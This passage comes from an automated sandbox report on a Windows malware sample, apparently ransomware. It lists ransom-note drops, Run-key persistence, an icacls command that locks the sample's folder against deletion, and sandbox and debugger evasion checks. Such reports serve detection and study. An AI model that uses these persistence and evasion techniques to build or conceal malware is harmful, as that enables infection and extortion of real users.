              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F22220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,0_2_00F22220
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F38565 push ecx; ret 0_2_00F38578
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F38565 push ecx; ret 2_2_00F38578
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F28565 push ecx; ret 3_2_00F28578
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F28565 push ecx; ret 4_2_00F28578

              Persistence and Installation Behavior

              barindex
              Infects executable files (exe, dll, sys, html)
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSystem file written: C:\Users\user\AppData\Local\Temp\chrome.exeJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\Local Settings\Temp\wctF86A.tmp.tgvv (copy)Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Temp\wctF86A.tmpJump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeJump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\_readme.txtJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\$WinREAgent\_readme.txtJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\$WinREAgent\Scratch\_readme.txtJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\_readme.txtJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F91920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,0_2_00F91920
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673" /deny *S-1-1-0:(OI)(CI)(DE,DC)
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Found stalling execution ending in API Sleep call
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeStalling execution: Execution stalls by calling Sleepgraph_2-41348
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F11193 rdtsc 0_2_00F11193
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F91920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,2_2_00F91920
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,0_2_00F1E670
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,2_2_00F1E670
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,3_2_00F0E670
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,4_2_00F0E670
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeThread delayed: delay time: 1200000Jump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeDropped PE file which has not been started: C:\Users\user\Local Settings\Temp\wctF86A.tmp.tgvv (copy)Jump to dropped file
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wctF86A.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeEvaded block: after key decision
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-39445
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeAPI coverage: 5.2 %
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe TID: 3620Thread sleep time: -1200000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe TID: 2892Thread sleep count: 170 > 30Jump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F20160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,0_2_00F20160
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F1F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,0_2_00F1F730
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F1FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,0_2_00F1FB98
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F1F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_00F1F730
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F20160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_00F20160
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F1FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,2_2_00F1FB98
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F0F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,3_2_00F0F730
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F10160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,3_2_00F10160
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F0FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,3_2_00F0FB98
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F10160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,4_2_00F10160
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F0F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,4_2_00F0F730
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F0FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,4_2_00F0FB98
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeThread delayed: delay time: 1200000Jump to behavior
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2323940560.00000000008D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWD
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000000.00000002.1641882208.0000000000C52000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000006.00000002.1865493833.0000000000CF9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000000.00000003.1636870769.0000000000C70000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000000.00000002.1641882208.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000000.00000002.1641882208.0000000000C70000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2323940560.0000000000848000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2323940560.00000000008D6000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000003.00000002.2884216333.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000003.00000002.2884216333.000000000075E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeAPI call chain: ExitProcess graph end nodegraph_0-39447
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F11193 rdtsc 0_2_00F11193
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F34168 _memset,IsDebuggerPresent,0_2_00F34168
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F3A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00F3A57A
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F91920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,2_2_00F91920
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F22220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,0_2_00F22220
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F378D5 GetProcessHeap,0_2_00F378D5
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F429EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F429EC
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F429BB SetUnhandledExceptionFilter,0_2_00F429BB
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F429EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00F429EC
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F429BB SetUnhandledExceptionFilter,2_2_00F429BB
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00F329EC
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F329BB SetUnhandledExceptionFilter,3_2_00F329BB
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00F329EC
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F329BB SetUnhandledExceptionFilter,4_2_00F329BB
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeProcess created: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe "C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F11000 cpuid 0_2_00F11000
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,0_2_00F48178
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_00F50116
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00F482A2
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: GetLocaleInfoW,_GetPrimaryLen,0_2_00F4834F
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,0_2_00F48423
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: EnumSystemLocalesW,0_2_00F487C8
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: GetLocaleInfoW,0_2_00F4884E
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,0_2_00F47BB3
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,0_2_00F47E83
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: EnumSystemLocalesW,0_2_00F47E27
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,0_2_00F47F83
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,0_2_00F47F00
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,2_2_00F48178
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_00F50116
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_00F482A2
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: GetLocaleInfoW,_GetPrimaryLen,2_2_00F4834F
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,2_2_00F48423
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: EnumSystemLocalesW,2_2_00F487C8
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: GetLocaleInfoW,2_2_00F4884E
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,2_2_00F47BB3
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_00F47E83
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: EnumSystemLocalesW,2_2_00F47E27
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,2_2_00F47F83
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_00F47F00
